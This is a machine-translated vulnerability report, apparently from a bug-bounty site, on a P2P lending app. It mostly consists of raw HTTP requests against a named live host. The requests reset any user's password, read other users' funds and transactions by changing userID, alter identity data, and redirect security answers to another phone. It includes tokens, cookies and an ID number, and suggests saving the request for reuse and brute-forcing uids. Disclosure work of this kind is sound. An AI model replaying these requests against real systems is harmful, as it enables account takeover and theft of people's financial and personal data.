P2P financial security: multiple design defects, such as password reset at jingjinlian (verification and repair are required)

P2P financial security: multiple design defects, such as password reset at jingjinlian (verification and repair are required)

Packed

Http://android.myapp.com/myapp/detail.htm? ApkName = com. jjl

Updated on: version 1.0.2, 2016.3.17

Download and install the APP

1. Password Reset

Use the registration function to send a verification code to your mobile phone.
 

Write down the body returned by the interface and the mobile phone Verification Code

For example
 

RandomCode: kGAMCEZ0UFw = corresponding verification code: 784204



Reset 13333333333, send the verification code, enter the information, and submit it to obtain an Interface
 

Use the preceding information to splice the interface
 

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset = UTF-8Content-Length: 155 Host: www. jjlwd. comConnection: Keep-AliveAccept-Encoding: gzipCookie: aliyungf_tc = AQAAAFLlt1sUHwgAzuXkesMh7BsNROmwUser-Agent: okhttp/2.1.0sign = token & verification_code = our verification code & functionType = 4 & phone_key = l1I % token % 3D % 3D & auth = jjlwd & info = 2015 & sms_key = Our randomCode & new_passwd = 123123 & mobile = 13333333333

Submission result
 

Modified successfully
 

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset=UTF-8Content-Length: 199Host: www.jjlwd.comConnection: Keep-AliveAccept-Encoding: gzipCookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2NUser-Agent: okhttp/2.1.0sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&verification_code=784204&functionType=4&phone_key=l1I%2FC01zZlj6GOhTk5KWcQ%3D%3D&auth=jjlwd&info=2015&sms_key=kGAMCEZ0UFw%3D&new_passwd=123123&mobile=13333333333

You can save this interface so that you do not need to send a verification code the next time you use it. (ps: You can copy the interface content for Password Reset)



2. Information Leakage

Login (the token is useless, the session is not, the uid is a digital location, and the excessive permission takes a wave)



The account fund information query interface allows you to view the account funds beyond authorization (you can find local accounts)
 

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset=UTF-8Content-Length: 118Host: www.jjlwd.comConnection: Keep-AliveAccept-Encoding: gzipCookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2NUser-Agent: okhttp/2.1.0userID=11888&functionType=40&auth=jjlwd&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&token=ECB1F97F4D805FE25e67ff2d

 

API for querying historical benefits, which can be unauthorized
 

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset=UTF-8Content-Length: 145Host: www.jjlwd.comConnection: Keep-AliveAccept-Encoding: gzipCookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2NUser-Agent: okhttp/2.1.0userID=11888&functionType=10&auth=jjlwd&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&token=ECB1F97F4D805FE25e67ff2d&page_count=10&page_index=1

 

 

Query the Revenue and Expenditure details, which can be unauthorized
 

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset=UTF-8Content-Length: 213Host: www.jjlwd.comConnection: Keep-AliveAccept-Encoding: gzipCookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2NUser-Agent: okhttp/2.1.0functionType=41&userID=11888&token=ECB1F97F4D805FE25e67ff2d&page_index=1&page_count=1000&startTime=2016-03-01+00%3A00%3A00&endTime=2016-03-31+23%3A59%3A59&auth=jjlwd&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29

 

3. Personal data modification

APP also has a function

Personal data table
 

If the name and ID card are not verified, the verification code is correct or not to determine whether to modify the personal data. Then, the verification code can be directly bypassed and the personal data can be changed by the same means as resetting the password.



For example

Modified Interface
 

POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset=UTF-8Content-Length: 262Host: www.jjlwd.comConnection: Keep-AliveAccept-Encoding: gzipCookie: aliyungf_tc=AQAAACQyGS1J7AwAlQ+I3bDjJoCyaq8VUser-Agent: okhttp/2.1.0sms_key=kGAMCEZ0UFw%3D&verification_code=784204&realName=%E4%BB%80%E4%B9%88%E9%AC%BC&userID=11888&functionType=13&key=l1I%2FC01zZlj6GOhTk5KWcQ%3D%3D&auth=jjlwd&idNo=513228198401237858&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&token=ECB1F97F4D805FE25e67ff2d

Change the verification code and randCOde.
 

Upon login, the server will return the user's ID card number and name

Before modification:
 

After modification:
 

There is also a heavy message, this interface also has a uid, there are also unauthorized operations, so, if one put into the burp to run a wave, blow (do not dare to try)





4. Obtain the password protection answer on the official website. You can modify the password protection answer.

Other defects on the official website

Official website login
 

If you forget the answer to the password protection question, you can send the answer to any mobile phone number.
 

Click [forgot password protection? Send to mobile phone. Capture the package and modify the mobile phone number.


 

View your own text message,
 

Enter the answer to the question and pass the security questions.
 

 

Above

Solution:

Strengthen verification and repair unauthorized access.



The verification code is not returned.

The verification code is bound to the mobile phone number.

Bind your account to your mobile phone number.

A 20R pair is required.